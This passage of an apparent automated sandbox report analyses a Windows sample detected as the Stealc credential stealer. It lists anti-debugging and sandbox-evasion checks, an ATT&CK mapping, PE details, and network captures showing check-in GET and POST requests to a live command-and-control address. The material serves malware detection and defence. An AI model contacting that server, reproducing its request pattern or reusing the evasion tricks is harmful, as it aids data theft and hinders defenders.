                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00ED38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ED4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00ECE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00ED4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00ECED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00ED3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC1160 GetSystemInfo,ExitProcess,0_2_00EC1160
                Source: file.exe, file.exe, 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareE0
                Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1720287948.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1720287948.0000000000E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13349
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13346
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13366
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13361
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13400
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC45C0 VirtualProtect ?,00000004,00000100,000000000_2_00EC45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00ED9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9750 mov eax, dword ptr fs:[00000030h]0_2_00ED9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00ED78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00ED9600
                Source: file.exe, file.exe, 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: bAProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00ED7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00ED7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00ED7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00ED7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpnfile.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php=file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpRfile.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.php)file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/Kfile.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37Dfile.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1525234
                              Start date and time:2024-10-03 22:50:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 0s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:1
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 81%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 83
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              Setup.exeGet hashmaliciousRedLineBrowse
                              • 185.215.113.22
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.9516214099603015
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'864'704 bytes
                              MD5:67ba8a4a441b8c1e892ab227cc5f142a
                              SHA1:5cf0a0706a9db5ec122d52576479f62327a655b1
                              SHA256:12db50d8781fb72163f2cc3eb674b94558050eb9e965c02ea8936ed1770ca298
                              SHA512:378c6fdd99b64c84c677c8873041aa74892d2fc818dc75b2c4bdbabc308f8e5301994593b414eaf82669e2484f6ca9d4c1d2763ba7c7b27121c20a7c6d0afa09
                              SSDEEP:49152:dFAjgmHKOnCX2JuUjipfS4kKjlQqjzv3aE:dhSc2JFOc49lQwzv3a
                              TLSH:398533ED37306367E670AF34A0A65224E36B33B80476CDD71C4D6BD12AAB541E35A13E
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0xaa6000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007FC2CCD6150Ah
                              rsqrtps xmm3, dqword ptr [eax+eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007FC2CCD63505h
                              inc ecx
                              push bx
                              dec esi
                              dec ebp
                              das
                              xor al, 36h
                              dec edi
                              bound ecx, dword ptr [ecx+4Ah]
                              dec edx
                              insd
                              push edi
                              dec eax
                              dec eax
                              jbe 00007FC2CCD61572h
                              push esi
                              dec edx
                              popad
                              je 00007FC2CCD6156Bh
                              push edx
                              dec esi
                              jc 00007FC2CCD6157Ah
                              cmp byte ptr [ebx], dh
                              push edx
                              jns 00007FC2CCD61547h
                              or eax, 49674B0Ah
                              cmp byte ptr [edi+43h], dl
                              jnc 00007FC2CCD6154Dh
                              bound eax, dword ptr [ecx+30h]
                              pop edx
                              inc edi
                              push esp
                              push 43473163h
                              aaa
                              push edi
                              dec esi
                              xor ebp, dword ptr [ebx+59h]
                              push edi
                              push edx
                              pop eax
                              je 00007FC2CCD61557h
                              xor dl, byte ptr [ebx+2Bh]
                              popad
                              jne 00007FC2CCD6154Ch
                              dec eax
                              dec ebp
                              jo 00007FC2CCD61543h
                              xor dword ptr [edi], esi
                              inc esp
                              dec edx
                              dec ebp
                              jns 00007FC2CCD61550h
                              insd
                              jnc 00007FC2CCD61570h
                              aaa
                              inc esp
                              inc ecx
                              inc ebx
                              xor dl, byte ptr [ecx+4Bh]
                              inc edx
                              inc esp
                              bound esi, dword ptr [ebx]
                              or eax, 63656B0Ah
                              jno 00007FC2CCD61558h
                              push edx
                              insb
                              js 00007FC2CCD61571h
                              outsb
                              inc ecx
                              jno 00007FC2CCD61552h
                              push ebp
                              inc esi
                              pop edx
                              xor eax, dword ptr [ebx+36h]
                              push eax
                              aaa
                              imul edx, dword ptr [ebx+58h], 4Eh
                              aaa
                              inc ebx
                              jbe 00007FC2CCD6154Ch
                              dec ebx
                              js 00007FC2CCD61543h
                              jne 00007FC2CCD61531h
                              push esp
                              inc bp
                              outsb
                              inc edx
                              popad
                              dec ebx
                              insd
                              dec ebp
                              inc edi
                              xor dword ptr [ecx+36h], esp
                              push 0000004Bh
                              sub eax, dword ptr [ebp+33h]
                              jp 00007FC2CCD6155Ch
                              dec edx
                              xor bh, byte ptr [edx+56h]
                              bound eax, dword ptr [edi+66h]
                              jbe 00007FC2CCD6153Ah
                              dec eax
                              or eax, 506C720Ah
                              aaa
                              xor dword ptr fs:[ebp+62h], ecx
                              arpl word ptr [esi], si
                              inc esp
                              jo 00007FC2CCD61573h

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x228004d250e44f6f87b36cfe5b03907266dfdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2a50000x200e836c6861f967166d901e295b3d3e541unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              qtygkfie0x5030000x1a20000x1a12004b65d9003beaa126788eea9110fc21e7False0.9948816067950255data7.952733470198543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              bnphghxp0x6a50000x10000x4006cd0bbb0da55e76047bcb92e32038ebeFalse0.798828125data6.2625656757416746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6a60000x30000x22009edef57b29f6477ff9317880496df6c7False0.39636948529411764DOS executable (COM)4.247893399963463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-03T22:50:59.767145+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 3, 2024 22:50:58.696605921 CEST4973080192.168.2.4185.215.113.37
                              Oct 3, 2024 22:50:58.701730013 CEST8049730185.215.113.37192.168.2.4
                              Oct 3, 2024 22:50:58.701814890 CEST4973080192.168.2.4185.215.113.37
                              Oct 3, 2024 22:50:58.702001095 CEST4973080192.168.2.4185.215.113.37
                              Oct 3, 2024 22:50:58.706903934 CEST8049730185.215.113.37192.168.2.4
                              Oct 3, 2024 22:50:59.405735016 CEST8049730185.215.113.37192.168.2.4
                              Oct 3, 2024 22:50:59.405826092 CEST4973080192.168.2.4185.215.113.37
                              Oct 3, 2024 22:50:59.533067942 CEST4973080192.168.2.4185.215.113.37
                              Oct 3, 2024 22:50:59.538088083 CEST8049730185.215.113.37192.168.2.4
                              Oct 3, 2024 22:50:59.766988993 CEST8049730185.215.113.37192.168.2.4
                              Oct 3, 2024 22:50:59.767144918 CEST4973080192.168.2.4185.215.113.37
                              Oct 3, 2024 22:51:03.398195028 CEST4973080192.168.2.4185.215.113.37

                              HTTP Request Dependency Graph

                              • 185.215.113.37

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.215.113.37806952C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 3, 2024 22:50:58.702001095 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 3, 2024 22:50:59.405735016 CEST203INHTTP/1.1 200 OK
                              Date: Thu, 03 Oct 2024 20:50:59 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 3, 2024 22:50:59.533067942 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
